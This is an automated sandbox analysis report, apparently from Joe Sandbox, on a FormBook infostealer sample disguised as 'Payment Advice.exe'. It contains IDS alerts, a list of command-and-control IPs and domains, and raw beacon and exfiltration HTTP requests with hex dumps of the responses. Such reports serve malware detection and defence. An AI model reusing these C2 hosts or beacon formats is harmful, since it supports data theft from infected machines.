Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_005CF5FA
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_005D1B2F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_005D1C8A
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_005D1F94
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0239BC20 FindFirstFileW,FindNextFileW,FindClose,	3_2_0239BC20

Source: C:\Windows\SysWOW64\clip.exe	Code function: 4x nop then xor eax, eax		3_2_02389870
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_0431053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 5.44.111.162:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 172.67.210.102:80

Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 172.67.210.102 172.67.210.102
Source: Joe Sandbox View	IP Address: 213.145.228.16 213.145.228.16

Source: Joe Sandbox View	ASN Name: VPSQUANUS VPSQUANUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: DOMAINTECHNIKAT DOMAINTECHNIKAT
Source: Joe Sandbox View	ASN Name: LOOPIASE LOOPIASE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_005D4EB5

Source: global traffic	HTTP traffic detected: GET /w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qe66/?kbRxoVY0=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&DnUL=_290s HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xzzi/?DnUL=_290s&kbRxoVY0=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rm91/?DnUL=_290s&kbRxoVY0=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4hda/?kbRxoVY0=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&DnUL=_290s HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /li0t/?DnUL=_290s&kbRxoVY0=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ei85/?kbRxoVY0=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&DnUL=_290s HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /aroo/?DnUL=_290s&kbRxoVY0=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tf44/?kbRxoVY0=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&DnUL=_290s HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lfkn/?kbRxoVY0=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&DnUL=_290s HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.hprlz.cz
Source: global traffic	DNS traffic detected: DNS query: www.catherineviskadi.com
Source: global traffic	DNS traffic detected: DNS query: www.hatercoin.online
Source: global traffic	DNS traffic detected: DNS query: www.fourgrouw.cfd
Source: global traffic	DNS traffic detected: DNS query: www.bfiworkerscomp.com
Source: global traffic	DNS traffic detected: DNS query: www.tinmapco.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
Source: global traffic	DNS traffic detected: DNS query: www.anuts.top
Source: global traffic	DNS traffic detected: DNS query: www.telwisey.info
Source: global traffic	DNS traffic detected: DNS query: www.sandranoll.com
Source: global traffic	DNS traffic detected: DNS query: www.gipsytroya.com
Source: global traffic	DNS traffic detected: DNS query: www.helpers-lion.online
Source: global traffic	DNS traffic detected: DNS query: www.dmtxwuatbz.cc

Source: unknown

HTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 205Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 6b 62 52 78 6f 56 59 30 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: kbRxoVY0=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 29 Aug 2024 03:23:43 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 29 Aug 2024 03:23:45 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 29 Aug 2024 03:23:48 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Thu, 29 Aug 2024 03:23:50 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 